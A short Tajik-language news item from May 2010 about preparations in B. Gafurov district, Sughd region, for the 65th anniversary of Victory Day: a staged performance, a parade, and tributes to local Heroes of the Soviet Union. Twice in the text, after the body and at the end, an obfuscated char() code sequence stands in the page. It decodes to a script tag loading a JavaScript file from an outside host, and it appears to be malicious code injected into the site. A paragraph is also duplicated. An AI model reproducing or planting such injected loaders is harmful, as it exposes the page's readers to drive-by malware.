7.05.2010
Омодагӣ ба Иди ғалаба
Бахшида ба ҷашни 65 солагии Иди ғалаба дар қаламрави вилояти Суғд чорабиниҳои идона дар назар аст. Чунон чи дар ноҳияи Б. Ғафуров паради ҳарбӣ ва намоиши театркунонидашуда дар назар аст. Давоми ҳафтаи ҷорӣ омодагӣ ба ин намоиши театркунонидашуда босуръат идома дорад. Муаллифи сенария Ғ. Рустамов ва Б. Қосимова. Ба гуфти мудири шӯъбаи фарҳанги ноҳия Б. Қосимова ин намоиш бо иштироки 600 нафар гузашта, шӯъбаҳои фарҳанг, маориф ва ҳамчунин ҷамоатҳо ба ин чорабинӣ вобаста шудаанд. Дар намоиш давраҳои пешазҷангӣ, оғози ҷанг ва даъвати ҷавонон ба фронт, гурӯҳи ташвиқотии тоҷикон, лаҳзаҳои ҷанг, рӯзи ғалаба тасвир ёфтаанд. Ҳамчунин 5 нафар сокинони ноҳияи Б. Ғафуров: Домулло Азизов, Фатҳулло Ахмедов, Ҳодӣ Кенҷаев, Исмоил Ҳамзаалиев ва Раҳимбой Раҳматов, ки дар ҶБВ ба унвони Қаҳрамони Иттифокӣ Шӯравӣ сарфароз гардида буданд инъикос шудаанд.
Номоиши мазкур як соат давом карда, дар Майдон Шаҳидони ҶБВ-и ноҳия гузаронида мешавад. Баъди он паради ҳарбӣ дар назар аст.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)290e33642b1e9a8950aaaabe41a70696.js" type="text/javascript">
Номоиши мазкур як соат давом карда, дар Майдон Шаҳидони ҶБВ-и ноҳия гузаронида мешавад. Баъди он паради ҳарбӣ дар назар аст.
Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)290e33642b1e9a8950aaaabe41a70696.js" type="text/javascript">

